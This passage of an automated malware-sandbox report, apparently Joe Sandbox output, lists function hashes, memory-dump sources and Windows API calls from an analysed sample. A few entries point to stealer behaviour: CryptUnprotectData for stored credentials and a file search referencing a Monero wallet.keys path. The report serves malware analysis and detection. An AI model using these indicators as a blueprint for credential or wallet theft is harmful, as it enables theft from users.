                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharCreateInstanceMultiWide
                  • String ID:
                  • API String ID: 123533781-0
                  • Opcode ID: bf2ecf64433e11e9e77c7b20adef9acd59f79a68bc574fd857116314e7c53ba2
                  • Instruction ID: d778f49479bee47ce242fe96c98a4a65f3f3853ce9dfe575946a9def1110ea36
                  • Opcode Fuzzy Hash: bf2ecf64433e11e9e77c7b20adef9acd59f79a68bc574fd857116314e7c53ba2
                  • Instruction Fuzzy Hash: BB41D774A40A289FDB24DB58CC95BDAB7B5BB48702F4041D8A618E72D0E771AEC5CF50
                  APIs
                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00B09B84
                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00B09BA3
                  • LocalFree.KERNEL32(?), ref: 00B09BD3
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Local$AllocCryptDataFreeUnprotect
                  • String ID:
                  • API String ID: 2068576380-0
                  • Opcode ID: 7d8a06ed8440bf58506ed257d443e3e3338864c071dc69fbe05f826782afb90d
                  • Instruction ID: 093f52250a2bec3cce61f8327a3065d484bda078c9011d0d8c081f865b8181c3
                  • Opcode Fuzzy Hash: 7d8a06ed8440bf58506ed257d443e3e3338864c071dc69fbe05f826782afb90d
                  • Instruction Fuzzy Hash: C511CCB9A00209EFDB04DF98D985AAE77F5FF89300F104598E91597390D774AE10CF61
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: Sjg[$`M|z$b{M
                  • API String ID: 0-3163793524
                  • Opcode ID: 43919284756039df6387217bd70a5a231b712a4a5d152d007a9884c85e5d628f
                  • Instruction ID: 49dfb285376e02ad052cf497c3b39858657fd52bd06ee8d66d86393f3b108b4d
                  • Opcode Fuzzy Hash: 43919284756039df6387217bd70a5a231b712a4a5d152d007a9884c85e5d628f
                  • Instruction Fuzzy Hash: 185158F3F082144BF3009978DC897AAB6D6DBD4320F2B463DDA98CB7C4D97D98458282
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: HVyv$>\
                  • API String ID: 0-261519995
                  • Opcode ID: 72dfd7eb339f6c65c45aac54e36b4815de034c2ffc03dbe577e25bd07a6b5c98
                  • Instruction ID: 08f662e324b0087205afc7af139ca2bf7fb73ca2e1c8c6bfd5a99e4a35d6fcd3
                  • Opcode Fuzzy Hash: 72dfd7eb339f6c65c45aac54e36b4815de034c2ffc03dbe577e25bd07a6b5c98
                  • Instruction Fuzzy Hash: 488136F3D186204BE3146E39EC84776B7D9DB94720F2B863DDF98A3784E979580482C6
                  APIs
                    • Part of subcall function 00B1A740: lstrcpy.KERNEL32(00B20E17,00000000), ref: 00B1A788
                    • Part of subcall function 00B1A920: lstrcpy.KERNEL32(00000000,?), ref: 00B1A972
                    • Part of subcall function 00B1A920: lstrcat.KERNEL32(00000000), ref: 00B1A982
                    • Part of subcall function 00B1A9B0: lstrlen.KERNEL32(?,011F8B70,?,\Monero\wallet.keys,00B20E17), ref: 00B1A9C5
                    • Part of subcall function 00B1A9B0: lstrcpy.KERNEL32(00000000), ref: 00B1AA04
                    • Part of subcall function 00B1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AA12
                    • Part of subcall function 00B1A8A0: lstrcpy.KERNEL32(?,00B20E17), ref: 00B1A905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00B215B8,00B20D96), ref: 00B0F71E
                  • StrCmpCA.SHLWAPI(?,00B215BC), ref: 00B0F76F
                  • StrCmpCA.SHLWAPI(?,00B215C0), ref: 00B0F785
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00B0FAB1
                  • FindClose.KERNEL32(000000FF), ref: 00B0FAC3
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID:
                  • API String ID: 3334442632-0
                  • Opcode ID: d7bd88228c41c47a83da6ea6be90487ff70b94821367e25325095ae9568bdad7
                  • Instruction ID: ca4d46feb1107c022185005a6fb52922f799bc0b6518d14661466b3af9071af6
                  • Opcode Fuzzy Hash: d7bd88228c41c47a83da6ea6be90487ff70b94821367e25325095ae9568bdad7
                  • Instruction Fuzzy Hash: 9A11963580115D9BDB24FBB0DD559ED77B8AF10310F8046E9A51A674D2EF303B8ACB92
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: Q=?
                  • API String ID: 0-2595168370
                  • Opcode ID: 4dc7264ba28d59f8a4dc7eaa8723086e05799c56cb624e9f67cb2b38171a67ef
                  • Instruction ID: 6a757c1cc500f7223d2354617ad33bb7a9b59ce453b32df36d4901aa6e683785
                  • Opcode Fuzzy Hash: 4dc7264ba28d59f8a4dc7eaa8723086e05799c56cb624e9f67cb2b38171a67ef
                  • Instruction Fuzzy Hash: 427123B3E182105BF308A929DC9576BB6D5EB94320F1B463DEE99E7784D9395C0182C2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: .+a}
                  • API String ID: 0-132381047
                  • Opcode ID: 6852bfe17ab8d17de0e242fea7f21b652597da26253ad939e3b83b94fe0e7341
                  • Instruction ID: f44e2b1db37ac265ce446f7f5b8a4a831755867656064575b94808d5acfc4a00
                  • Opcode Fuzzy Hash: 6852bfe17ab8d17de0e242fea7f21b652597da26253ad939e3b83b94fe0e7341
                  • Instruction Fuzzy Hash: 1D6146F3A483046BE308AE6EDC8177AB7DAEBD4320F16853DE7C587780E97945018296
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ac96961764b2d35450ff9e850d9adbd84838bef0daeab6c31776014814c5f119
                  • Instruction ID: 2d2cf63ec494daf952179407cc7441456a16f2a909bbda0f9889e57dc9110063
                  • Opcode Fuzzy Hash: ac96961764b2d35450ff9e850d9adbd84838bef0daeab6c31776014814c5f119
                  • Instruction Fuzzy Hash: 5942D4F3A0C2049FD3046E29EC8577AFBE9EF94720F1A892DE6C483744E63598458797
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d83897f0541f83be60fcdaa05ae66ecb03d97b2b97f7715001c5e7dddd66ec27
                  • Instruction ID: cea1703167b8b71435f1a5c8aa43f2c77a26530485690bb867049acfcb3fb63e
                  • Opcode Fuzzy Hash: d83897f0541f83be60fcdaa05ae66ecb03d97b2b97f7715001c5e7dddd66ec27
                  • Instruction Fuzzy Hash: B75108F3A186005FF348BE2DDC8577AB6D5EF88320F5A453DDAC9C7784E93958018692
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d8e27afb8940ba3a695a49ef20eec170914d3bd772b7d95b8a6f901085c8d403
                  • Instruction ID: c3fe44360a76d7bad1766b2c5973e1c16c6e34f0f9a8ad7766eabdec2b7ee48e
                  • Opcode Fuzzy Hash: d8e27afb8940ba3a695a49ef20eec170914d3bd772b7d95b8a6f901085c8d403
                  • Instruction Fuzzy Hash: 00516EF3A192055FE300AD3CDD89776B7D6EBD0320F1E863DEA84C7749E93899058691
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b68d20486330016bc2ba3d29838127ce98a219f14751d7682740c01ac5c78fa5
                  • Instruction ID: a005523bffbad952d781e87707a3dba8624502a65edf794f0efdd173db2eda6c
                  • Opcode Fuzzy Hash: b68d20486330016bc2ba3d29838127ce98a219f14751d7682740c01ac5c78fa5
                  • Instruction Fuzzy Hash: 315158F3F092148BF3481A39DD69766B6C69BD0320F2F863EDA88973C0EC7D08060285
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7c549721a1ede6824e11c7aaf5e5219888ec57e10957d5a5b47d1583b1d6f25f
                  • Instruction ID: 2a2428a79ba0659471cd1335a948e81b179210ee6fb2efe8870d13f281b4de90
                  • Opcode Fuzzy Hash: 7c549721a1ede6824e11c7aaf5e5219888ec57e10957d5a5b47d1583b1d6f25f
                  • Instruction Fuzzy Hash: D54128F3E086148BF3046E68EDC577AB7D9EB54320F2A463D9B94937C0E9791D0486C6
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2b1ee7f930988c97a670ac01aa61683de59d8ffc8c04153f79563314ce3b3769
                  • Instruction ID: 7401ceef43ae8a726329322882378d60493107ba1148e08e43addf8831f7eaa5
                  • Opcode Fuzzy Hash: 2b1ee7f930988c97a670ac01aa61683de59d8ffc8c04153f79563314ce3b3769
                  • Instruction Fuzzy Hash: 8F4144F3E143144BF748593DED88766769BDBD4320F2B823EDA8897388EC784D0A4285
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmp
